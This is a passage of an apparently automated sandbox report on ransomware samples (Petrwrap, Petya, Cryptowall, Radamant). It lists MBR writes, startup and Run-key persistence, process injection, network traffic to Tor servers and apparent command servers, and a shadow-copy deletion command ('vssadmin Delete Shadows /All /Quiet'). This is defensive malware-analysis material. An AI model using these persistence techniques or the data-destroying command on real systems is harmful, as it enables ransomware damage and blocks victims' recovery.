Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A
File opened for modification C:\Windows\assembly C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 144.99.8.204.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 166.120.202.116.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 165.120.202.116.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.146:443 dist.torproject.org tcp
US 8.8.8.8:53 146.99.8.204.in-addr.arpa udp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp

Files

memory/1448-0-0x00007FFB0C8C5000-0x00007FFB0C8C6000-memory.dmp

memory/1448-1-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

memory/1448-2-0x000000001D000000-0x000000001D4CE000-memory.dmp

memory/1448-3-0x000000001BE40000-0x000000001BEDC000-memory.dmp

memory/1448-4-0x000000001BF60000-0x000000001BFC2000-memory.dmp

memory/1448-5-0x000000001B880000-0x000000001B888000-memory.dmp

memory/1448-6-0x000000001DB00000-0x000000001DB52000-memory.dmp

memory/1448-14-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

memory/1448-15-0x00007FFB0C8C5000-0x00007FFB0C8C6000-memory.dmp

memory/1448-16-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

memory/1448-17-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

2s

Max time network

3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Network

N/A

Files

memory/328-1-0x0000000000400000-0x00000000004CB000-memory.dmp

memory/328-0-0x000000000040E000-0x000000000041B000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:00

Platform

win10v2004-20240611-en

Max time kernel

3s

Max time network

12s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp

Files

memory/1896-0-0x000000000040E000-0x000000000041B000-memory.dmp

memory/1896-1-0x0000000000400000-0x00000000004CB000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1786s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d6587785.exe C:\Windows\syswow64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\d658778 = "C:\\d6587785\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*658778 = "C:\\d6587785\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\d6587785 = "C:\\Users\\Admin\\AppData\\Roaming\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*6587785 = "C:\\Users\\Admin\\AppData\\Roaming\\d6587785.exe" C:\Windows\syswow64\explorer.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-addr.es N/A N/A
N/A myexternalip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2960 set thread context of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\vssadmin.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
N/A N/A C:\Windows\syswow64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2960 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
PID 2404 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2404 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2404 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2404 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 3064 wrote to memory of 2672 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 3064 wrote to memory of 2672 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 3064 wrote to memory of 2672 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 3064 wrote to memory of 2672 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 3064 wrote to memory of 2704 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 3064 wrote to memory of 2704 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 3064 wrote to memory of 2704 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 3064 wrote to memory of 2704 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

C:\Windows\syswow64\explorer.exe

"C:\Windows\syswow64\explorer.exe"

C:\Windows\syswow64\svchost.exe

-k netsvcs

C:\Windows\syswow64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-addr.es udp
NL 188.165.164.184:80 ip-addr.es tcp
US 8.8.8.8:53 myexternalip.com udp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 94.247.28.26:2525 tcp
NL 188.165.164.184:80 ip-addr.es tcp
US 34.117.118.44:80 myexternalip.com tcp
FR 94.247.28.156:8081 tcp
FR 91.121.12.127:4141 tcp
US 209.148.85.151:8080 tcp

Files

memory/2404-13-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-12-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2404-8-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-6-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-4-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-2-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-0-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2404-15-0x0000000000400000-0x0000000000425000-memory.dmp

memory/3064-14-0x0000000000080000-0x00000000000A5000-memory.dmp

memory/2672-20-0x0000000000080000-0x00000000000A5000-memory.dmp

memory/2960-22-0x0000000000400000-0x00000000037E7000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1790s

Max time network

1177s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"

